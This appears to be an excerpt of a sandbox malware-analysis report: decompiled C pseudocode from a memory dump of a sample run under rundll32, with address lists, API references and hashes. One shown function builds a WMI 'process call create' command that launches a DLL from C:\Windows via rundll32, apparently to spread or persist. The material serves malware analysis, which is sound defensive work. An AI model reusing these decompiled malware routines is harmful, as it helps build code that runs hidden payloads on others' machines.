                                                                                                                                                  				_a12 = wsprintfW(__ebx,  &_v88, _a4, _a8, _a12);
                                                                                                                                                  				_t98 = 0;
                                                                                                                                                  				do {
                                                                                                                                                  					_t48 = _t98 + L"process call create \"C:\\Windows\\System32\\rundll32.exe"; // 0x720070
                                                                                                                                                  					_t108 =  *_t48 & 0x0000ffff;
                                                                                                                                                  					 *(_t146 + _t98 - 0x25c) = _t108;
                                                                                                                                                  					_t98 = _t98 + 2;
                                                                                                                                                  				} while (_t108 != 0);
                                                                                                                                                  				_t112 =  &_v608 - 2;
                                                                                                                                                  				do {
                                                                                                                                                  					_t99 =  *(_t112 + 2);
                                                                                                                                                  					_t112 = _t112 + 2;
                                                                                                                                                  				} while (_t99 != 0);
                                                                                                                                                  				_t100 = 0xb;
                                                                                                                                                  				_t86 = memcpy(_t112, L" \\\"C:\\Windows\\%s\\\" #1 ", _t100 << 2);
                                                                                                                                                  				asm("movsw");
                                                                                                                                                  				_t145 = _a12 + wsprintfW( &(__ebx[_t86]),  &_v608,  &_v1128);
                                                                                                                                                  				E04776735( &_v17512, 0x1fff);
                                                                                                                                                  				_t104 =  &_v17512;
                                                                                                                                                  				while(1) {
                                                                                                                                                  					_t91 =  *_t104 & 0x0000ffff;
                                                                                                                                                  					if(_t91 == 0x22) {
                                                                                                                                                  						_t109 = 0x5c;
                                                                                                                                                  						_t96[_t145] = _t109;
                                                                                                                                                  						_t145 = _t145 + 1;
                                                                                                                                                  					}
                                                                                                                                                  					_t96[_t145] = _t91;
                                                                                                                                                  					if(_t91 == 0) {
                                                                                                                                                  						break;
                                                                                                                                                  					}
                                                                                                                                                  					_t104 =  &(_t104[1]);
                                                                                                                                                  					_t145 = _t145 + 1;
                                                                                                                                                  				}
                                                                                                                                                  				wsprintfW( &(_t96[_t145]), "\"");
                                                                                                                                                  				return 1;
                                                                                                                                                  			}























































































                                                                                                                                                  0x04779972
                                                                                                                                                  0x0477997a
                                                                                                                                                  0x04779982
                                                                                                                                                  0x0477998d
                                                                                                                                                  0x04779994
                                                                                                                                                  0x04779997
                                                                                                                                                  0x0477999b
                                                                                                                                                  0x0477999e
                                                                                                                                                  0x047799a2
                                                                                                                                                  0x047799a5
                                                                                                                                                  0x047799a9
                                                                                                                                                  0x047799ac
                                                                                                                                                  0x047799b0
                                                                                                                                                  0x047799b3
                                                                                                                                                  0x047799b7
                                                                                                                                                  0x047799ba
                                                                                                                                                  0x047799bd
                                                                                                                                                  0x047799c3
                                                                                                                                                  0x047799c7
                                                                                                                                                  0x047799ca
                                                                                                                                                  0x047799cd
                                                                                                                                                  0x047799d3
                                                                                                                                                  0x047799d7
                                                                                                                                                  0x047799dc
                                                                                                                                                  0x047799e2
                                                                                                                                                  0x047799e6
                                                                                                                                                  0x047799e9
                                                                                                                                                  0x047799ed
                                                                                                                                                  0x047799f0
                                                                                                                                                  0x047799f4
                                                                                                                                                  0x047799f5
                                                                                                                                                  0x047799fd
                                                                                                                                                  0x04779a01
                                                                                                                                                  0x04779a04
                                                                                                                                                  0x04779a08
                                                                                                                                                  0x04779a09
                                                                                                                                                  0x04779a0f
                                                                                                                                                  0x04779a10
                                                                                                                                                  0x04779a18
                                                                                                                                                  0x04779a1c
                                                                                                                                                  0x04779a1d
                                                                                                                                                  0x04779a23
                                                                                                                                                  0x04779a29
                                                                                                                                                  0x04779a31
                                                                                                                                                  0x04779a35
                                                                                                                                                  0x04779a38
                                                                                                                                                  0x04779a3c
                                                                                                                                                  0x04779a3d
                                                                                                                                                  0x04779a43
                                                                                                                                                  0x04779a46
                                                                                                                                                  0x04779a4a
                                                                                                                                                  0x04779a4d
                                                                                                                                                  0x04779a51
                                                                                                                                                  0x04779a53
                                                                                                                                                  0x04779a57
                                                                                                                                                  0x04779a5d
                                                                                                                                                  0x04779a61
                                                                                                                                                  0x04779a64
                                                                                                                                                  0x04779a68
                                                                                                                                                  0x04779a6b
                                                                                                                                                  0x04779a6f
                                                                                                                                                  0x04779a72
                                                                                                                                                  0x04779a76
                                                                                                                                                  0x04779a79
                                                                                                                                                  0x04779a7f
                                                                                                                                                  0x04779a83
                                                                                                                                                  0x04779a86
                                                                                                                                                  0x04779a8a
                                                                                                                                                  0x04779a8e
                                                                                                                                                  0x04779a9a
                                                                                                                                                  0x04779aa3
                                                                                                                                                  0x04779aa7
                                                                                                                                                  0x04779aab
                                                                                                                                                  0x04779ab8
                                                                                                                                                  0x04779abb
                                                                                                                                                  0x04779abd
                                                                                                                                                  0x04779abd
                                                                                                                                                  0x04779abd
                                                                                                                                                  0x04779ac4
                                                                                                                                                  0x04779acc
                                                                                                                                                  0x04779acf
                                                                                                                                                  0x04779ada
                                                                                                                                                  0x04779add
                                                                                                                                                  0x04779add
                                                                                                                                                  0x04779ae1
                                                                                                                                                  0x04779ae4
                                                                                                                                                  0x04779aeb
                                                                                                                                                  0x04779af1
                                                                                                                                                  0x04779b04
                                                                                                                                                  0x04779b15
                                                                                                                                                  0x04779b23
                                                                                                                                                  0x04779b28
                                                                                                                                                  0x04779b2e
                                                                                                                                                  0x04779b2e
                                                                                                                                                  0x04779b34
                                                                                                                                                  0x04779b38
                                                                                                                                                  0x04779b39
                                                                                                                                                  0x04779b3d
                                                                                                                                                  0x04779b3d
                                                                                                                                                  0x04779b3e
                                                                                                                                                  0x04779b45
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04779b47
                                                                                                                                                  0x04779b4a
                                                                                                                                                  0x04779b4a
                                                                                                                                                  0x04779b56
                                                                                                                                                  0x04779b60

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 047788D3: PathFindFileNameW.SHLWAPI(04787BC8,7491C0B0,?,047795B2), ref: 047788E3
                                                                                                                                                  • wsprintfW.USER32 ref: 04779AAF
                                                                                                                                                  • wsprintfW.USER32 ref: 04779B0D
                                                                                                                                                  • wsprintfW.USER32 ref: 04779B56
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: wsprintf$FileFindNamePath
                                                                                                                                                  • String ID: \"C:\Windows\%s\" #1
                                                                                                                                                  • API String ID: 988121887-1875761687
                                                                                                                                                  • Opcode ID: 15b049621c08119ce3bb304922948261d914d1ff1dd3f36fcfcd75d3bdf16c06
                                                                                                                                                  • Instruction ID: 7a04647f9cffd471a52e1c0ad7d5ab4bd5f719d4113e3130ff22230f2cce2395
                                                                                                                                                  • Opcode Fuzzy Hash: 15b049621c08119ce3bb304922948261d914d1ff1dd3f36fcfcd75d3bdf16c06
                                                                                                                                                  • Instruction Fuzzy Hash: 58517723E64358A5EF20DFD4E805BEFB774FF447A0F50606AE604AB2A0F2B15941C799
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                  			E04776F7C(void* __ecx, intOrPtr _a4) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				_Unknown_base(*)()* _t7;
                                                                                                                                                  
                                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                                  				_t7 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "IsWow64Process");
                                                                                                                                                  				if(_t7 != 0) {
                                                                                                                                                  					 *_t7(_a4,  &_v8);
                                                                                                                                                  				}
                                                                                                                                                  				return _v8;
                                                                                                                                                  			}





                                                                                                                                                  0x04776f80
                                                                                                                                                  0x04776f95
                                                                                                                                                  0x04776f9d
                                                                                                                                                  0x04776fa6
                                                                                                                                                  0x04776fa6
                                                                                                                                                  0x04776fac

                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,04777170,00000000,?,04777AF8), ref: 04776F8E
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 04776F95
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                  • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                  • API String ID: 1646373207-3024904723
                                                                                                                                                  • Opcode ID: 90cdf5f2a13b2e0e78b82ce1f4239874be4175e1f22581bd4bf95ad96e538e5c
                                                                                                                                                  • Instruction ID: eca073e781b834f6969f8317a53232d6fff5d5740d5b707ca1c53b03bcab0217
                                                                                                                                                  • Opcode Fuzzy Hash: 90cdf5f2a13b2e0e78b82ce1f4239874be4175e1f22581bd4bf95ad96e538e5c
                                                                                                                                                  • Instruction Fuzzy Hash: C0D012B1640209BBDB20EB94DD0AE9D7768DF15749F908018B506E1140D7B8EB02DB24
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E04774B5D(intOrPtr* __eax, void* _a4, signed char _a7, intOrPtr* _a8, signed int* _a12, signed short* _a16) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				signed int _v12;
                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                  				intOrPtr* _t120;
                                                                                                                                                  				intOrPtr* _t122;
                                                                                                                                                  				intOrPtr* _t124;
                                                                                                                                                  				intOrPtr* _t126;
                                                                                                                                                  				intOrPtr* _t128;
                                                                                                                                                  				intOrPtr* _t130;
                                                                                                                                                  				signed short _t136;
                                                                                                                                                  				void* _t139;
                                                                                                                                                  				void* _t141;
                                                                                                                                                  				signed char _t143;
                                                                                                                                                  				signed short _t145;
                                                                                                                                                  				intOrPtr* _t147;
                                                                                                                                                  				intOrPtr* _t150;
                                                                                                                                                  				intOrPtr* _t153;
                                                                                                                                                  				signed char _t156;
                                                                                                                                                  				intOrPtr* _t160;
                                                                                                                                                  				intOrPtr* _t163;
                                                                                                                                                  				intOrPtr* _t166;
                                                                                                                                                  				signed char _t169;
                                                                                                                                                  				signed short _t171;
                                                                                                                                                  				intOrPtr* _t176;
                                                                                                                                                  				intOrPtr* _t182;
                                                                                                                                                  				intOrPtr* _t187;
                                                                                                                                                  				signed char _t188;
                                                                                                                                                  				intOrPtr _t189;
                                                                                                                                                  				intOrPtr _t190;
                                                                                                                                                  				intOrPtr _t191;
                                                                                                                                                  				intOrPtr _t192;
                                                                                                                                                  				intOrPtr _t193;
                                                                                                                                                  				intOrPtr _t194;
                                                                                                                                                  				short _t202;
                                                                                                                                                  				signed int _t203;
                                                                                                                                                  				intOrPtr* _t205;
                                                                                                                                                  				intOrPtr* _t208;
                                                                                                                                                  				intOrPtr* _t211;
                                                                                                                                                  				intOrPtr _t214;
                                                                                                                                                  				intOrPtr _t216;
                                                                                                                                                  				intOrPtr _t218;
                                                                                                                                                  				intOrPtr _t219;
                                                                                                                                                  				intOrPtr _t221;
                                                                                                                                                  				intOrPtr _t223;
                                                                                                                                                  				signed int _t225;
                                                                                                                                                  				intOrPtr _t227;
                                                                                                                                                  				signed int _t228;
                                                                                                                                                  				intOrPtr _t230;
                                                                                                                                                  				intOrPtr* _t232;
                                                                                                                                                  				void* _t234;
                                                                                                                                                  				intOrPtr _t236;
                                                                                                                                                  				signed char _t237;
                                                                                                                                                  				intOrPtr _t238;
                                                                                                                                                  				signed char _t239;
                                                                                                                                                  				intOrPtr* _t240;
                                                                                                                                                  				signed int _t241;
                                                                                                                                                  				intOrPtr _t243;
                                                                                                                                                  				void* _t245;
                                                                                                                                                  				void* _t252;
                                                                                                                                                  				void* _t256;
                                                                                                                                                  				void* _t257;
                                                                                                                                                  				void* _t258;
                                                                                                                                                  				void* _t259;
                                                                                                                                                  				void* _t260;
                                                                                                                                                  				void* _t261;
                                                                                                                                                  				void* _t262;
                                                                                                                                                  				void* _t263;
                                                                                                                                                  				void* _t265;
                                                                                                                                                  				void* _t266;
                                                                                                                                                  				void* _t267;
                                                                                                                                                  				void* _t268;
                                                                                                                                                  				void* _t269;
                                                                                                                                                  				void* _t270;
                                                                                                                                                  				signed int _t276;
                                                                                                                                                  				void* _t278;
                                                                                                                                                  				void* _t279;
                                                                                                                                                  				void* _t280;
                                                                                                                                                  				signed int _t281;
                                                                                                                                                  				void* _t282;
                                                                                                                                                  
                                                                                                                                                  				_t187 = __eax;
                                                                                                                                                  				 *_a12 =  *_a12 & 0x00000000;
                                                                                                                                                  				_t120 = __eax;
                                                                                                                                                  				_v5 = 0;
                                                                                                                                                  				_t3 = _t120 + 1; // 0x1
                                                                                                                                                  				_t265 = _t3;
                                                                                                                                                  				do {
                                                                                                                                                  					_t189 =  *_t120;
                                                                                                                                                  					_t120 = _t120 + 1;
                                                                                                                                                  				} while (_t189 != 0);
                                                                                                                                                  				_v12 = _t120 - _t265;
                                                                                                                                                  				_t122 = __eax;
                                                                                                                                                  				_t5 = _t122 + 1; // 0x1
                                                                                                                                                  				_t266 = _t5;
                                                                                                                                                  				do {
                                                                                                                                                  					_t190 =  *_t122;
                                                                                                                                                  					_t122 = _t122 + 1;
                                                                                                                                                  				} while (_t190 != 0);
                                                                                                                                                  				_t245 = _t122 - _t266;
                                                                                                                                                  				_t124 = __eax;
                                                                                                                                                  				_t6 = _t124 + 1; // 0x1
                                                                                                                                                  				_t267 = _t6;
                                                                                                                                                  				do {
                                                                                                                                                  					_t191 =  *_t124;
                                                                                                                                                  					_t124 = _t124 + 1;
                                                                                                                                                  				} while (_t191 != 0);
                                                                                                                                                  				_v16 = _t124 - _t267;
                                                                                                                                                  				_t126 = __eax;
                                                                                                                                                  				_t8 = _t126 + 1; // 0x1
                                                                                                                                                  				_t268 = _t8;
                                                                                                                                                  				do {
                                                                                                                                                  					_t192 =  *_t126;
                                                                                                                                                  					_t126 = _t126 + 1;
                                                                                                                                                  				} while (_t192 != 0);
                                                                                                                                                  				_t234 = _t126 - _t268;
                                                                                                                                                  				_t128 = _a8;
                                                                                                                                                  				_t10 = _t128 + 1; // 0x1
                                                                                                                                                  				_t269 = _t10;
                                                                                                                                                  				do {
                                                                                                                                                  					_t193 =  *_t128;
                                                                                                                                                  					_t128 = _t128 + 1;
                                                                                                                                                  				} while (_t193 != 0);
                                                                                                                                                  				_v20 = _t128 - _t269;
                                                                                                                                                  				_t130 = _a8;
                                                                                                                                                  				_t13 = _t130 + 1; // 0x1
                                                                                                                                                  				_t270 = _t13;
                                                                                                                                                  				do {
                                                                                                                                                  					_t194 =  *_t130;
                                                                                                                                                  					_t130 = _t130 + 1;
                                                                                                                                                  				} while (_t194 != 0);
                                                                                                                                                  				_t20 = (_v12 + _v16 + _v20) * 2; // 0x10088
                                                                                                                                                  				_t136 = (0x0000fffe - _t245 + _t245 & 0x00000003) + (0x0000fffe - _t234 + _t234 & 0x00000003) + (0x0000fffe - _t130 - _t270 + _t130 - _t270 & 0x00000003) + _t20 + 0x8a;
                                                                                                                                                  				 *_a16 = _t136;
                                                                                                                                                  				_t139 = HeapAlloc(GetProcessHeap(), 8, _t136 & 0x0000ffff);
                                                                                                                                                  				 *_a12 = _t139;
                                                                                                                                                  				if(_t139 != 0) {
                                                                                                                                                  					_t276 = 0;
                                                                                                                                                  					_t252 = 0x18;
                                                                                                                                                  					do {
                                                                                                                                                  						_t23 = _t276 + 0x4783730; // 0xfcfffffa
                                                                                                                                                  						 *(_t276 + _t139) =  !( *_t23);
                                                                                                                                                  						_t276 = _t276 + 1;
                                                                                                                                                  						_t252 = _t252 - 1;
                                                                                                                                                  					} while (_t252 != 0);
                                                                                                                                                  					_t202 = 0xc;
                                                                                                                                                  					 *(_t139 + 0xc) = 2;
                                                                                                                                                  					 *((short*)(_t139 + 0x16)) = _t202;
                                                                                                                                                  					_t28 = _t139 + 0x18; // 0x18
                                                                                                                                                  					_t203 = 5;
                                                                                                                                                  					_t141 = memcpy(_t28, _a4, _t203 << 2);
                                                                                                                                                  					_t205 = _t187;
                                                                                                                                                  					_t30 = _t205 + 1; // 0x1
                                                                                                                                                  					_t278 = _t30;
                                                                                                                                                  					do {
                                                                                                                                                  						_t236 =  *_t205;
                                                                                                                                                  						_t205 = _t205 + 1;
                                                                                                                                                  					} while (_t236 != 0);
                                                                                                                                                  					 *((intOrPtr*)(_t141 + 0x2c)) = _t205 - _t278 + 1;
                                                                                                                                                  					_t208 = _t187;
                                                                                                                                                  					_t32 = _t208 + 1; // 0x1
                                                                                                                                                  					_t279 = _t32;
                                                                                                                                                  					do {
                                                                                                                                                  						_t237 =  *_t208;
                                                                                                                                                  						_t208 = _t208 + 1;
                                                                                                                                                  					} while (_t237 != 0);
                                                                                                                                                  					 *((intOrPtr*)(_t141 + 0x34)) = _t208 - _t279 + 1;
                                                                                                                                                  					_t211 = _t187;
                                                                                                                                                  					_v12 = 0x38;
                                                                                                                                                  					_a7 = _t237;
                                                                                                                                                  					_t36 = _t211 + 1; // 0x1
                                                                                                                                                  					_t280 = _t36;
                                                                                                                                                  					do {
                                                                                                                                                  						_t238 =  *_t211;
                                                                                                                                                  						_t211 = _t211 + 1;
                                                                                                                                                  					} while (_t238 != 0);
                                                                                                                                                  					if(_t211 != _t280) {
                                                                                                                                                  						_t241 = 0;
                                                                                                                                                  						do {
                                                                                                                                                  							_v12 = _v12 + 2;
                                                                                                                                                  							_a7 = _a7 + 1;
                                                                                                                                                  							 *((char*)(_t141 + (_v12 & 0x0000ffff))) =  *((intOrPtr*)(_t241 + _t187));
                                                                                                                                                  							_t232 = _t187;
                                                                                                                                                  							_t44 = _t232 + 1; // 0x1
                                                                                                                                                  							_t282 = _t44;
                                                                                                                                                  							do {
                                                                                                                                                  								_t243 =  *_t232;
                                                                                                                                                  								_t232 = _t232 + 1;
                                                                                                                                                  							} while (_t243 != 0);
                                                                                                                                                  							_t241 = _a7 & 0x000000ff;
                                                                                                                                                  						} while (_t241 < _t232 - _t282);
                                                                                                                                                  					}
                                                                                                                                                  					_v12 = _v12 + 2;
                                                                                                                                                  					_t143 = _v12 & 3;
                                                                                                                                                  					if(_t143 < 0) {
                                                                                                                                                  						_t143 = (_t143 - 0x00000001 | 0xfffffffc) + 1;
                                                                                                                                                  					}
                                                                                                                                                  					if(_t143 != 0) {
                                                                                                                                                  						_v12 = _v12 + (_t143 & 0x000000ff);
                                                                                                                                                  					}
                                                                                                                                                  					_t281 =  *_a12;
                                                                                                                                                  					_t145 = rand();
                                                                                                                                                  					_v12 = _v12 + 4;
                                                                                                                                                  					 *((_v12 & 0x0000ffff) + _t281) = _t145 & 0x0000ffff;
                                                                                                                                                  					_t147 = _t187;
                                                                                                                                                  					_t56 = _t147 + 1; // 0x1
                                                                                                                                                  					_t256 = _t56;
                                                                                                                                                  					do {
                                                                                                                                                  						_t214 =  *_t147;
                                                                                                                                                  						_t147 = _t147 + 1;
                                                                                                                                                  					} while (_t214 != 0);
                                                                                                                                                  					_v12 = _v12 + 8;
                                                                                                                                                  					 *((_v12 & 0x0000ffff) + _t281) = _t147 - _t256 + 1;
                                                                                                                                                  					_t150 = _t187;
                                                                                                                                                  					_t61 = _t150 + 1; // 0x1
                                                                                                                                                  					_t257 = _t61;
                                                                                                                                                  					do {
                                                                                                                                                  						_t216 =  *_t150;
                                                                                                                                                  						_t150 = _t150 + 1;
                                                                                                                                                  					} while (_t216 != 0);
                                                                                                                                                  					_v12 = _v12 + 4;
                                                                                                                                                  					 *((_v12 & 0x0000ffff) + _t281) = _t150 - _t257 + 1;
                                                                                                                                                  					_t153 = _t187;
                                                                                                                                                  					_t239 = 0;
                                                                                                                                                  					_t66 = _t153 + 1; // 0x1
                                                                                                                                                  					_t258 = _t66;
                                                                                                                                                  					do {
                                                                                                                                                  						_t218 =  *_t153;
                                                                                                                                                  						_t153 = _t153 + 1;
                                                                                                                                                  					} while (_t218 != 0);
                                                                                                                                                  					if(_t153 != _t258) {
                                                                                                                                                  						_t228 = 0;
                                                                                                                                                  						do {
                                                                                                                                                  							_v12 = _v12 + 2;
                                                                                                                                                  							 *((_v12 & 0x0000ffff) + _t281) =  *((intOrPtr*)(_t228 + _t187));
                                                                                                                                                  							_t182 = _t187;
                                                                                                                                                  							_t239 = _t239 + 1;
                                                                                                                                                  							_t72 = _t182 + 1; // 0x1
                                                                                                                                                  							_t263 = _t72;
                                                                                                                                                  							do {
                                                                                                                                                  								_t230 =  *_t182;
                                                                                                                                                  								_t182 = _t182 + 1;
                                                                                                                                                  							} while (_t230 != 0);
                                                                                                                                                  							_t228 = _t239 & 0x000000ff;
                                                                                                                                                  						} while (_t228 < _t182 - _t263);
                                                                                                                                                  					}
                                                                                                                                                  					_v12 = _v12 + 2;
                                                                                                                                                  					_t156 = _v12 & 3;
                                                                                                                                                  					if(_t156 < 0) {
                                                                                                                                                  						_t156 = (_t156 - 0x00000001 | 0xfffffffc) + 1;
                                                                                                                                                  					}
                                                                                                                                                  					if(_t156 != 0) {
                                                                                                                                                  						_v12 = _v12 + (_t156 & 0x000000ff);
                                                                                                                                                  					}
                                                                                                                                                  					_v12 = _v12 + 4;
                                                                                                                                                  					_t240 = _a8;
                                                                                                                                                  					 *((_v12 & 0x0000ffff) + _t281) = 0xf01ff;
                                                                                                                                                  					_v12 = _v12 + 4;
                                                                                                                                                  					 *((_v12 & 0x0000ffff) + _t281) = 0x10;
                                                                                                                                                  					_v12 = _v12 + 8;
                                                                                                                                                  					 *((_v12 & 0x0000ffff) + _t281) = 2;
                                                                                                                                                  					_t160 = _t240;
                                                                                                                                                  					_t259 = _t160 + 1;
                                                                                                                                                  					do {
                                                                                                                                                  						_t219 =  *_t160;
                                                                                                                                                  						_t160 = _t160 + 1;
                                                                                                                                                  					} while (_t219 != 0);
                                                                                                                                                  					_v12 = _v12 + 8;
                                                                                                                                                  					 *((_v12 & 0x0000ffff) + _t281) = _t160 - _t259 + 1;
                                                                                                                                                  					_t163 = _t240;
                                                                                                                                                  					_t260 = _t163 + 1;
                                                                                                                                                  					do {
                                                                                                                                                  						_t221 =  *_t163;
                                                                                                                                                  						_t163 = _t163 + 1;
                                                                                                                                                  					} while (_t221 != 0);
                                                                                                                                                  					_v12 = _v12 + 4;
                                                                                                                                                  					 *((_v12 & 0x0000ffff) + _t281) = _t163 - _t260 + 1;
                                                                                                                                                  					_t166 = _t240;
                                                                                                                                                  					_t188 = 0;
                                                                                                                                                  					_t261 = _t166 + 1;
                                                                                                                                                  					do {
                                                                                                                                                  						_t223 =  *_t166;
                                                                                                                                                  						_t166 = _t166 + 1;
                                                                                                                                                  					} while (_t223 != 0);
                                                                                                                                                  					if(_t166 != _t261) {
                                                                                                                                                  						_t225 = 0;
                                                                                                                                                  						do {
                                                                                                                                                  							_v12 = _v12 + 2;
                                                                                                                                                  							 *((_v12 & 0x0000ffff) + _t281) =  *((intOrPtr*)(_t225 + _t240));
                                                                                                                                                  							_t176 = _t240;
                                                                                                                                                  							_t188 = _t188 + 1;
                                                                                                                                                  							_t262 = _t176 + 1;
                                                                                                                                                  							do {
                                                                                                                                                  								_t227 =  *_t176;
                                                                                                                                                  								_t176 = _t176 + 1;
                                                                                                                                                  							} while (_t227 != 0);
                                                                                                                                                  							_t225 = _t188 & 0x000000ff;
                                                                                                                                                  						} while (_t225 < _t176 - _t262);
                                                                                                                                                  					}
                                                                                                                                                  					_v12 = _v12 + 2;
                                                                                                                                                  					_t169 = _v12 & 3;
                                                                                                                                                  					if(_t169 < 0) {
                                                                                                                                                  						_t169 = (_t169 - 0x00000001 | 0xfffffffc) + 1;
                                                                                                                                                  					}
                                                                                                                                                  					if(_t169 != 0) {
                                                                                                                                                  						_v12 = _v12 + (_t169 & 0x000000ff);
                                                                                                                                                  					}
                                                                                                                                                  					_t171 = _v12 + 0x1c;
                                                                                                                                                  					 *_a16 = _t171;
                                                                                                                                                  					 *(_t281 + 8) = _t171;
                                                                                                                                                  					_v5 = 1;
                                                                                                                                                  				}
                                                                                                                                                  				return _v5;
                                                                                                                                                  			}



















































































                                                                                                                                                  0x04774b64
                                                                                                                                                  0x04774b69
                                                                                                                                                  0x04774b6d
                                                                                                                                                  0x04774b70
                                                                                                                                                  0x04774b74
                                                                                                                                                  0x04774b74
                                                                                                                                                  0x04774b77
                                                                                                                                                  0x04774b77
                                                                                                                                                  0x04774b79
                                                                                                                                                  0x04774b7a
                                                                                                                                                  0x04774b80
                                                                                                                                                  0x04774b83
                                                                                                                                                  0x04774b85
                                                                                                                                                  0x04774b85
                                                                                                                                                  0x04774b88
                                                                                                                                                  0x04774b88
                                                                                                                                                  0x04774b8a
                                                                                                                                                  0x04774b8b
                                                                                                                                                  0x04774b91
                                                                                                                                                  0x04774b93
                                                                                                                                                  0x04774b95
                                                                                                                                                  0x04774b95
                                                                                                                                                  0x04774b98
                                                                                                                                                  0x04774b98
                                                                                                                                                  0x04774b9a
                                                                                                                                                  0x04774b9b
                                                                                                                                                  0x04774ba1
                                                                                                                                                  0x04774ba4
                                                                                                                                                  0x04774ba6
                                                                                                                                                  0x04774ba6
                                                                                                                                                  0x04774ba9
                                                                                                                                                  0x04774ba9
                                                                                                                                                  0x04774bab
                                                                                                                                                  0x04774bac
                                                                                                                                                  0x04774bb2
                                                                                                                                                  0x04774bb4
                                                                                                                                                  0x04774bb7
                                                                                                                                                  0x04774bb7
                                                                                                                                                  0x04774bba
                                                                                                                                                  0x04774bba
                                                                                                                                                  0x04774bbc
                                                                                                                                                  0x04774bbd
                                                                                                                                                  0x04774bc3
                                                                                                                                                  0x04774bc6
                                                                                                                                                  0x04774bc9
                                                                                                                                                  0x04774bc9
                                                                                                                                                  0x04774bcc
                                                                                                                                                  0x04774bcc
                                                                                                                                                  0x04774bce
                                                                                                                                                  0x04774bcf
                                                                                                                                                  0x04774c04
                                                                                                                                                  0x04774c04
                                                                                                                                                  0x04774c0b
                                                                                                                                                  0x04774c1b
                                                                                                                                                  0x04774c24
                                                                                                                                                  0x04774c28
                                                                                                                                                  0x04774c30
                                                                                                                                                  0x04774c32
                                                                                                                                                  0x04774c33
                                                                                                                                                  0x04774c33
                                                                                                                                                  0x04774c3b
                                                                                                                                                  0x04774c3e
                                                                                                                                                  0x04774c3f
                                                                                                                                                  0x04774c3f
                                                                                                                                                  0x04774c47
                                                                                                                                                  0x04774c48
                                                                                                                                                  0x04774c4f
                                                                                                                                                  0x04774c55
                                                                                                                                                  0x04774c58
                                                                                                                                                  0x04774c59
                                                                                                                                                  0x04774c5b
                                                                                                                                                  0x04774c5d
                                                                                                                                                  0x04774c5d
                                                                                                                                                  0x04774c60
                                                                                                                                                  0x04774c60
                                                                                                                                                  0x04774c62
                                                                                                                                                  0x04774c63
                                                                                                                                                  0x04774c6a
                                                                                                                                                  0x04774c6d
                                                                                                                                                  0x04774c6f
                                                                                                                                                  0x04774c6f
                                                                                                                                                  0x04774c72
                                                                                                                                                  0x04774c72
                                                                                                                                                  0x04774c74
                                                                                                                                                  0x04774c75
                                                                                                                                                  0x04774c7c
                                                                                                                                                  0x04774c7f
                                                                                                                                                  0x04774c81
                                                                                                                                                  0x04774c88
                                                                                                                                                  0x04774c8b
                                                                                                                                                  0x04774c8b
                                                                                                                                                  0x04774c8e
                                                                                                                                                  0x04774c8e
                                                                                                                                                  0x04774c90
                                                                                                                                                  0x04774c91
                                                                                                                                                  0x04774c97
                                                                                                                                                  0x04774c99
                                                                                                                                                  0x04774c9b
                                                                                                                                                  0x04774ca2
                                                                                                                                                  0x04774ca6
                                                                                                                                                  0x04774ca9
                                                                                                                                                  0x04774cac
                                                                                                                                                  0x04774cae
                                                                                                                                                  0x04774cae
                                                                                                                                                  0x04774cb1
                                                                                                                                                  0x04774cb1
                                                                                                                                                  0x04774cb3
                                                                                                                                                  0x04774cb4
                                                                                                                                                  0x04774cb8
                                                                                                                                                  0x04774cbe
                                                                                                                                                  0x04774c9b
                                                                                                                                                  0x04774cc2
                                                                                                                                                  0x04774cca
                                                                                                                                                  0x04774ccf
                                                                                                                                                  0x04774cd5
                                                                                                                                                  0x04774cd5
                                                                                                                                                  0x04774cd8
                                                                                                                                                  0x04774cdd
                                                                                                                                                  0x04774cdd
                                                                                                                                                  0x04774ce4
                                                                                                                                                  0x04774ce6
                                                                                                                                                  0x04774cf0
                                                                                                                                                  0x04774cf7
                                                                                                                                                  0x04774cfa
                                                                                                                                                  0x04774cfc
                                                                                                                                                  0x04774cfc
                                                                                                                                                  0x04774cff
